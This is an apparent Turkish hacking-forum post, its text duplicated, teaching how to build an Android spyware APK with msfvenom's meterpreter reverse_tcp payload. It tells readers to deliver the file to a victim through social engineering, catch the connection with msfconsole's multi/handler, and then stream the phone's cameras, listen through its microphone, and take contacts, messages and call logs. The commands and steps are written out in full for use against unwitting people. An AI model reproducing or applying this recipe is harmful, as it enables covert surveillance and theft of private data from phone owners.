Cümleten selamın aleyküm beyler
Bugün android telefonlara msfvenom kullanarak payload yazıp root kullanıcı olarak nasıl sizabiliceğimizi anlatmaya çalışıcam umarım faydalı olur
Konuya geçelim direk olarak ilk olarak sahip olmanız gereken işletim sistemi kali linux malum payload yazıcaz ve gerekli araçlar kalide mevcut
Şimdi anlattığım şeylerden bişey anlamayan arkadaşlar için bu terimlerden bazılarının tanımını yapayım konu biraz daha açıklığa kavuşsun
Payload nedir ?
Exploit Sonrasında hedef sisteme sızmamızı sağlayan bileşenlere denir
Şimdi bakalım payload yazarak nasıl sistemde backdoor oluşturucaz
Forumda daha önce payload yoluyla bilgisayarlara sızma konusu mevcuttu mantık aynı arkadaşlar sadece 1-2 kod değişikliği yapıcaz
Öncelikle payload ı yazmadan linux terminaline girin ve
komutunu girin
İP Adresiniz payload için lazım
Payload için kod ;
Şimdi payload'ımız masaüstünde hazır bir şekilde bizi bekliyor bunu kurbanınıza sosyal mühendisliğinizi konuşturarak yollayıp açtırıyorsunuz ardından hasat zamanı geliyor exploit menümüze gelelim sırasıyla kodları takip ederek ;
yazıyoruz ve son olarak terminale exploit komutunu göndererek programdan yanıt almasını bekliyoruz kurbanımız ne zaman exploiti etkin hale getirirse karşınıza bir menü ekranı gelicekdir zaten
Peki neler yapabiliriz ?
Telefonun ön ve arka kamerasından live stream
Kişi listesini almak
Mesaj dökümanlarını almak
Telefonun mikrofonunu dinlemek
Cihazın root lu olup olmadığını öğrenmek
Arama kaydını almak gibi birçok özellik mevcut
Umarım işinize yarar THT ailesi daha önce açıldıysa kusura bakmayın biraz bakındığımda bu konuya rastlayamadım herkeze şimdiden kolay gelsin
Bugün android telefonlara msfvenom kullanarak payload yazıp root kullanıcı olarak nasıl sizabiliceğimizi anlatmaya çalışıcam umarım faydalı olur
Konuya geçelim direk olarak ilk olarak sahip olmanız gereken işletim sistemi kali linux malum payload yazıcaz ve gerekli araçlar kalide mevcut
Şimdi anlattığım şeylerden bişey anlamayan arkadaşlar için bu terimlerden bazılarının tanımını yapayım konu biraz daha açıklığa kavuşsun
Payload nedir ?
Exploit Sonrasında hedef sisteme sızmamızı sağlayan bileşenlere denir
Şimdi bakalım payload yazarak nasıl sistemde backdoor oluşturucaz
Forumda daha önce payload yoluyla bilgisayarlara sızma konusu mevcuttu mantık aynı arkadaşlar sadece 1-2 kod değişikliği yapıcaz
Öncelikle payload ı yazmadan linux terminaline girin ve
Kod:
ifconfig
İP Adresiniz payload için lazım
Payload için kod ;
msfvenom -p android/meterpreter/reverse_tcp LHOST=Buraya ifconfig kodundan çıkan ipnizi yazıyorsunuz LPORT=4444 R > /root/Masaüstü/uygulamanızın ismi.apk
Şimdi payload'ımız masaüstünde hazır bir şekilde bizi bekliyor bunu kurbanınıza sosyal mühendisliğinizi konuşturarak yollayıp açtırıyorsunuz ardından hasat zamanı geliyor exploit menümüze gelelim sırasıyla kodları takip ederek ;
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse/tcp
set LHOST=ifconfig den çıkan ip numaranız
set LPORT=4444
yazıyoruz ve son olarak terminale exploit komutunu göndererek programdan yanıt almasını bekliyoruz kurbanımız ne zaman exploiti etkin hale getirirse karşınıza bir menü ekranı gelicekdir zaten
Peki neler yapabiliriz ?
Telefonun ön ve arka kamerasından live stream
Kişi listesini almak
Mesaj dökümanlarını almak
Telefonun mikrofonunu dinlemek
Cihazın root lu olup olmadığını öğrenmek
Arama kaydını almak gibi birçok özellik mevcut
Umarım işinize yarar THT ailesi daha önce açıldıysa kusura bakmayın biraz bakındığımda bu konuya rastlayamadım herkeze şimdiden kolay gelsin
